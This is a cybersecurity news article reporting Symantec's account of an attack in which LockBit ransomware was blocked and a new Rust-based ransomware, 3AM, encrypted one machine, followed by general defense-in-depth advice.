In a Recent Attack, Hackers Deploy 3AM Ransomware After Failing to Execute LockBit
The Attack
In a recent attack against a construction company, hackers attempted to deploy LockBit ransomware but were unsuccessful. However, they were able to break through using a second ransomware called 3AM, which had never been seen before. Researchers from Symantec reported that this attack involved a double-whammy ransomware strategy, in which LockBit was blocked, but 3AM managed to infect one compromised machine. This incident serves as a reminder to organizations that attackers may use multiple ransomware families in their attempts to breach networks.
Unique Characteristics of 3AM Ransomware
3AM ransomware sets itself apart with an unusual theme. The ransomware encrypts files and appends them with the suffix “.threeamtime” while referencing the time of day in its ransom note. The note begins with the words, “Hello, ‘3 am’, The time of mysticism, isn’t it?”
The malware is a 64-bit executable written in Rust, a popular coding language for hackers and cybersecurity professionals. Its primary objective is to encrypt files, delete backup copies, and deploy the ransom note. It also attempts to terminate various security and backup-related software on the infected machine.
The Attack Process
The attackers started by infiltrating the target network and gathering user information. They used tools such as Cobalt Strike and PsExec to escalate privileges and execute reconnaissance commands like whoami and netstat. Additionally, they searched for other servers for lateral movement and created a new user for persistence. Once they had all the necessary information, they utilized the Wput utility to upload the victim’s files to their FTP server.
LockBit‘s Failed Deployment
The attackers originally intended to deploy LockBit as their primary ransomware. However, the target’s cybersecurity protections successfully blocked its execution. This highlights the importance of implementing effective cybersecurity measures to counter known threats.
The Success of 3AM
Although LockBit failed, the attackers were prepared with an alternative weapon: 3AM ransomware. In this attack, the hackers managed to infect three machines with 3AM, but were only successful in fully compromising one. According to Dick O’Brien, Principal Intelligence Analyst for the Symantec Threat Hunter Team, the success of 3AM was likely due to its status as a previously unseen threat.
The Importance of Defense in Depth
As this attack demonstrates, organizations need to adopt a multi-layered approach to cybersecurity known as “defense in depth.” It is vital to address all stages of a potential attack and not merely focus on blocking specific types of malware. O’Brien advises that organizations should implement robust cybersecurity measures to detect and prevent all stages of an attack as early as possible. This approach minimizes the risk of successful infiltration and limits damage to the network.
Stopping Ransomware
Ransomware attacks are complex operations with multiple stages. Taking a comprehensive approach to cybersecurity helps organizations detect and block these attacks early on. By incorporating proactive measures such as intrusion detection systems, endpoint protection, and secure backup solutions, organizations can significantly reduce their vulnerability to ransomware attacks.
Additionally, regular employee training on recognizing phishing attempts and maintaining strong password hygiene can minimize the risk of successful network infiltration. It is also crucial to keep security software and operating systems patched and up to date to mitigate any potential vulnerabilities.
Ultimately, the earlier an attack is stopped, the better chance an organization has of avoiding significant damage and financial loss. Cybersecurity should be a top priority for businesses of all sizes as the threat landscape continues to evolve.
Conclusion
The recent attack involving the deployment of 3AM ransomware serves as a reminder that hackers are continually adapting their tactics to breach network defenses. Defending against ransomware requires a multi-pronged approach that encompasses robust cybersecurity measures, employee training, and regular software updates and patches. Organizations should remain proactive in their security posture to stay ahead of the constantly evolving threat landscape.
<< photo by cottonbro studio >>
The image is for illustrative purposes only and does not depict the actual situation.
You might want to read !
- AuthMind Scores $8.5 Million in Seed Funding to Revolutionize IT Disaster Recovery Technology
- The Rise of Keystroke Exploits: A Stealthy Threat to Password Security
- The Growing Divide: Online Scams Targeting the Young Leave Seniors Unscathed
- Breaking Down the Communication Barrier: Bridging the Gap Between CISOs and the Board
- The Evolution of Cyber Threats: Next-Gen Attacks Borrow APT Strategies
- Airbus Launches Probe into Cybersecurity Breach After Data Leak
- The Expanding Web of Deception: Unmasking the Secret Phishing Syndicate Targeting Thousands of Microsoft 365 Accounts
- Car Manufacturers’ Negligence Leaves Owners Powerless Over Personal Data
- Supply Chain Security: A Strategic Solution for a Resilient Future
- Examining the Deepfake Dilemma: US Agencies Issue Alarming Cybersecurity Report
- The Growing Threat: Exploring the Alarming Rise of Ransomware Attacks on the Healthcare Sector
